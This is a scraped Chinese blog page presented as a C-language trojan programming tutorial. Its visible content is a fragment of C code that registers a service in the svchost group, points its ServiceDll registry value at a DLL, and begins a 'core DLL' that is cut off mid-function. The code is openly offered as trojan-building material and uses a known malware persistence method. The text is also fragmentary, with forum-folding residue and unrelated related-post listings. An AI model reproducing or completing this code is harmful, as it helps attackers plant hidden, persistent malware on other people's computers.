1. 全栈程序员必看首页

c语言 木马编程教学,木马编程 之超强服务… 附代码 原创.

全栈程序员-站长 未分类 阅读 37

c语言 木马编程教学,木马编程 之超强服务… 附代码 原创.该楼层疑似违规已被系统折叠隐藏此楼查看此楼}BOOLAddSvchostGroup(VOID){HKEYhkey;//其实是一个句柄.if(RegOpenKey(HKEY_LOCAL_MACHINE,”SOFTWARE\\Microsoft\\WindowsNT\\CurrentVersion\\SvcHost”,&hkey)!=ERROR_SUCCESS)returnFALSE…

大家好,又见面了,我是你们的朋友全栈君。

该楼层疑似违规已被系统折叠 隐藏此楼查看此楼

}

BOOL AddSvchostGroup(VOID)

{

HKEY hkey;//其实是一个句柄.

if(

RegOpenKey(HKEY_LOCAL_MACHINE,

“SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SvcHost”,

&hkey)!=ERROR_SUCCESS

)

return FALSE;

if(

RegSetValueEx(hkey,m_ServiceInfo.ServiceName,0,REG_MULTI_SZ,

(BYTE *)m_ServiceInfo.ServiceName,lstrlen(m_ServiceInfo.ServiceName)) !=ERROR_SUCCESS

)

return FALSE;

RegCloseKey(hkey);

return TRUE;

}

//添加DLL 路径参数

BOOL AddParameters_ServiceDll(LPSTR DllPath)

{

HKEY hkey;//其实是一个句柄.

CHAR SubKey[255]={NULL};

sprintf(SubKey,”SYSTEM\\ControlSet001\\Services\\%s\\Parameters”,m_ServiceInfo.ServiceName);

if(RegCreateKey(HKEY_LOCAL_MACHINE,SubKey,&hkey)!=ERROR_SUCCESS)

return FALSE;

if(RegSetValueEx(hkey,”ServiceDll”,0,REG_EXPAND_SZ,(BYTE *)DllPath,lstrlen(DllPath)) !=ERROR_SUCCESS)

return FALSE;

RegCloseKey(hkey);

return TRUE;

}

int main(int argc, char* argv[])

{

CHAR BinPath[MAX_PATH]=”%SystemRoot%\\System32\\svchost.exe -k “;

strcat(BinPath,m_ServiceInfo.ServiceName);

puts(BinPath);

MyCreateServiceFuntion(BinPath);

AddSvchostGroup();

CHAR DllPath[]=”c:\\test.dll”;

AddParameters_ServiceDll(DllPath);

return 0;

}

//核心 DLL

#include “stdafx.h”

#include

char     svcname[MAX_PATH];

SERVICE_STATUS_HANDLE hServiceStatus;

int TellSCM( DWORD dwState, DWORD dwExitCode, DWORD dwProgress )

{

SERVICE_STATUS srvStatus;

srvStatus.dwServiceType = SERVICE_WIN32_SHARE_PROCESS;

srvStatus.dwCurrentState = dwState;

srvStatus.dwControlsAccepted = SERVICE_ACCEPT_SHUTDOWN;

srvStatus.dwWin32ExitCode = dwExitCode;

版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请联系我们举报,一经查实,本站将立刻删除。

发布者:全栈程序员-站长,转载请注明出处:https://javaforall.net/147551.html原文链接:https://javaforall.net

(0)
0 0

关于作者

全栈程序员-站长的头像

全栈程序员-站长

133.5K 文章
3 粉丝
本网站汇聚当前互联网主流语音,持续更新,欢迎关注公众号“全栈程序员社区”
上一篇 2022年6月14日 下午10:16
下一篇 2022年6月14日 下午10:16


相关推荐

  • 国产算力新突破:科大讯飞发布星火X1.5 科大讯飞

    国产算力新突破:科大讯飞发布星火X1.5

    国产算力新突破:科大讯飞发布星火X1.5

    Ai探索者的头像 Ai探索者
    2026年3月14日
    2
  • curl 模拟 GET\POST 请求,以及 curl post 上传文件

    curl 模拟 GET\POST 请求,以及 curl post 上传文件

    curl 模拟 GET\POST 请求,以及 curl post 上传文件curl 模拟 GET POST 请求 以及 curlpost 上传文件一般情况下 我们调试数据接口 都会使用一个 postman 的工具 但是这个工具还是有点大了 事实上 我们在调试一些小功能的时候 完全没有必要使用它 在命令行中 我们使用 curl 这个工具 完全可以满足我们轻量的调试要求 下面 我们来简单的说一下 curl 的一些常见使用方法 curlGET 请求 cu

    全栈程序员-站长的头像 全栈程序员-站长
    2026年3月19日
    2
  • 阅读micropyton源码-添加C扩展类模块(1)

    阅读micropyton源码-添加C扩展类模块(1)

    阅读micropyton源码-添加C扩展类模块(1)阅读 micropyton 源码 添加 C 扩展类模块 1 苏勇 2021 年 8 月文章目录阅读 micropyton 源码 添加 C 扩展类模块 1 Introduction 在 python 内核中注册 machine 模块包含的 Pin 模块小结 Introduction 在前文 为 micropython 添加模块 2 类模块 中 我按照源代码排列的顺序 大体阅读了 micropython 添加 C 扩展模块的编程方式及其源代码 在通读 micropython 源码之后 我认为使用自顶向下的方式阅读和描述这部分更有助于开发者理解和编程 经年之

    全栈程序员-站长的头像 全栈程序员-站长
    2026年3月17日
    2
  • OpenClaw:真正能“动手”的“龙虾”智能体 openclaw

    OpenClaw:真正能“动手”的“龙虾”智能体

    OpenClaw:真正能“动手”的“龙虾”智能体

    全栈程序员-站长的头像 全栈程序员-站长
    2026年3月13日
    1
  • html overflow隐藏滚动条,css隐藏滚动条方法

    html overflow隐藏滚动条,css隐藏滚动条方法

    html overflow隐藏滚动条,css隐藏滚动条方法我们在前端开发过程中经常会遇到这种情况 在一小块的内容上会加上滚动条 但是为了美观我们会隐藏滚动条还需要支持滚动 最容易的办法就是使用 iscroll 插件来实现 但这不是我们想要的 细想一下 现在 css 其实就可以实现这个功能 经过我深思熟虑后 想到了 3 中比较好的方法 亲测可以使用 并完美兼容 一 通过计算滚动条的宽度来隐藏 HTML 代码 css 代码 outer container width

    全栈程序员-站长的头像 全栈程序员-站长
    2026年3月16日
    3
  • instsrv.exe srvany.exe用法「建议收藏」

    instsrv.exe srvany.exe用法「建议收藏」

    instsrv.exe srvany.exe用法「建议收藏」nstsrv.exe——来自Windows 2000 Resource Kits的一个小工具  微软官方对该小工具的说明:Installs and uninstalls executable services and assigns names to them.显而易见,这个小工具是用以安装和卸载可执行的服务和指派服务名给这些可执行的服务的。那么怎么去使用呢?这里我们设定要将F

    全栈程序员-站长的头像 全栈程序员-站长
    2022年6月11日
    29

发表回复

您的邮箱地址不会被公开。 必填项已用 * 标注

关注全栈程序员社区公众号